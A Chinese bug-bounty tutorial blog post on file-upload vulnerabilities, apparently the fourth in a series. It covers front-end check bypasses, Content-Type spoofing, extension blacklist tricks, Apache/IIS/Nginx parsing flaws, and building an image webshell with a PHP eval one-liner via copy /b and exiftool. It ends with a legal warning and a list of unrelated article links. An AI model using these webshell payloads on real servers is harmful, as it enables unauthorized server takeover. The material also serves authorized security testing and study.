当前位置：首页 > article >正文

【SRC漏洞挖掘系列】第04期：文件上传与解析——把图片变成“特洛伊木马”

article 2026/5/20 15:13:36

上期回顾我们刚用 SQL 注入把数据库翻了个底朝天。本期我们来聊聊更暴力的漏洞——文件上传。如果说 SQL 注入是“偷”那文件上传就是直接往人家服务器里安炸弹。一、为什么文件上传是“高危”在 SRC 评级里GetShell拿到服务器权限通常是最高级Critical。而文件上传是实现 GetShell 最直接的捷径。理想情况一句话木马- 上传成功 - 菜刀/蚁剑连接 - 控制服务器。现实情况一句话木马- WAF 拦截非法字符 - 服务器重命名 - 文件被放到无法执行的目录。所以我们需要“骗”过服务器。二、绕过前端的“纸老虎”很多开发以为在前端做个 JS 校验就安全了这叫掩耳盗铃。1. 场景还原网页 JS 代码if (file.type ! image/jpeg) { alert(只允许 JPG 图片); return false; }2. 绕过姿势禁用 JS浏览器按 F12把 JS 禁了随便传。改包先把马改成.jpg上传用 Burp Suite 抓包再把文件名改回.php。控制台修改在 Console 里直接删掉校验函数。SRC 提示这种漏洞一般评低危因为稍微有点安全意识的厂商都会做后端校验。三、绕过后端校验的“攻防战”这是实战中最精彩的部分。1. MIME 类型绕过Content-Type后端代码逻辑只允许image/jpeg。绕过抓包修改httpContent-Disposition: form-data; namefile; filenameshell.php Content-Type: image/jpeg -- 重点在这里伪装成图片2. 黑名单绕过老版本的噩梦如果后端禁止.php,.asp,.jsp。试试这些冷门后缀Windows/IISshell.php5shell.phtmlshell.asp;.jpg(IIS 6.0 经典漏洞分号截断)3. 大小写与双写大小写.PhP(Linux 区分大小写但有些中间件配置不严谨)。双写shell.pphphp(过滤php时删除第一个php剩下php)。四、解析漏洞给服务器“洗脑”有时候你上传的是.jpg但服务器却把它当成.php来执行。这就是解析漏洞。1. Apache 解析漏洞原理Apache 是从右往左解析后缀的。文件名shell.php.jpg解析顺序.jpg不认识 - 继续往左 -.php认识 -当成 PHP 执行。2. IIS 6.0 经典姿势目录解析/test.asp/shell.jpg(只要文件夹叫.asp里面的文件不管啥后缀都执行)。文件解析shell.asp;.jpg(分号截断)。3. Nginx 解析漏洞CVE-2013-4547Payloadshell.jpg\0.php解释Nginx 看到\0空字符截断认为后面是.php于是交给 FastCGI 处理结果执行了前面的 JPG 内容。五、实战演练制作“图片马”很多时候服务器会检查文件内容魔术头不是 JPEG 格式直接拦截。制作步骤Kali Linux / CMD# 将一句话木马追加到正常图片末尾 copy /b normal.jpg shell.php evil.jpg或者用 Exiftoolexiftool -Comment?php eval($_POST[cmd]); ? normal.jpg -o shell.jpg结果文件头是JFIF(图片)骗过后端校验。文件尾是?php ... ?服务器解析时执行代码。连接测试上传成功后访问http://target.com/uploads/evil.jpg。用蚁剑连接成功 GetShell六、SRC 报告中的“坑”无解析你传了个shell.php但它在/uploads/目录下没有执行权限。结果厂商可能忽略或者评为“无效”。自包含你传了个文件但无法访问路径不知道存哪了。结果无法证明危害评级降低。报告技巧一定要截图证明“能够执行系统命令”如whoami而不仅仅是“文件传上去了”。七、互动与思考绕过姿势适用场景成功率前端禁用JS弱智站点90%MIME 绕过仅校验 Content-Type60%图片马解析漏洞强校验文件内容极高互动话题各位老司机你们当年第一次 GetShell 是用什么姿势是经典的phpinfo()探针还是直接system(calc)弹计算器装逼⚠️ 法律红线警示严禁在未授权服务器上传 Webshell、挖矿病毒或任何形式的恶意软件。严禁利用 GetShell 权限查看、下载或篡改服务器内的用户数据这是犯罪。测试原则证明可以执行phpinfo()或简单的echo命令即可立即停止切勿进一步深入。靶机练习请在本地搭建Upload-Labs、DVWA 等靶场进行练习。技术是把双刃剑拿剑的手决定了它是凶器还是护盾。请务必守住法律底线。 ️下一期我们将进入“业务逻辑漏洞上”。告别代码层面我们要开始“骗人”了——如何通过修改数据包把别人的快递改寄到你家敬请期待

【SRC漏洞挖掘系列】第04期：文件上传与解析——把图片变成“特洛伊木马”

相关文章：

【SRC漏洞挖掘系列】第04期：文件上传与解析——把图片变成“特洛伊木马”

利用Taotoken模型广场为不同任务场景选择合适的大模型

将JSON文件作为Python的配置文件，读取和使用的写法

Linux内核平台设备深度盘点：从原理到实战的全面解析

如何彻底解决《神界：原罪2》模组冲突问题：Divinity Mod Manager 专业指南

北京UPS不间断电源经销商推荐名录

3步搞定Windows字体个性化定制：终极免费方案

智能车竞赛光电组核心技术解析：从图像处理到PID控制

大数据之安装zookeeper

AMD游戏本ChinaJoy三连发：从3D V-Cache到性价比旗舰的全面解析

告别手动挖洞：用Netsparker自动化扫描你的Web应用（附实战报告解读）

4.2% 稳健扩容！工业厂房从传统基建向智慧绿色赛道破局

2026年写作类国际竞赛测评：从技术视角分析高含金量赛事与留学背景提升策略

帮孩子建立时间观念：从认识“十分钟有多长”开始

2025终极指南：如何用PyGlossary打破词典格式壁垒

如何通过Excel MCP Server实现无Excel环境下的自动化表格处理

荧光改性PEG磷脂

如何快速掌握3DS硬件检测：面向初学者的完整3DSident使用指南

别再死记硬背了！用Python脚本模拟UDS 28服务，5分钟搞懂通信控制

告别集群负载：用Docker Compose在外部机器部署Prometheus+Grafana监控K8S（附完整配置文件）

Photoshop图层批量导出终极指南：5分钟掌握高效工作流

别再混着用了！详解Nginx 1.25.1中独立的http2指令与listen指令的拆分逻辑

“零关税”为中非合作装上“加速器”

思源宋体TTF完全指南：免费商用的高品质中文字体解决方案

BepInEx框架指南：从游戏玩家到模组开发者的完整升级路径

Prompt核心原则与技巧

2026墙体广告供应商亲测靠谱！

企业级应用如何通过taotoken统一管理多个大模型api调用与成本

第八章：AI产品的技术尽调——如何评估AI供应商

第七章：LLM输出质量评估方法——从指标到流程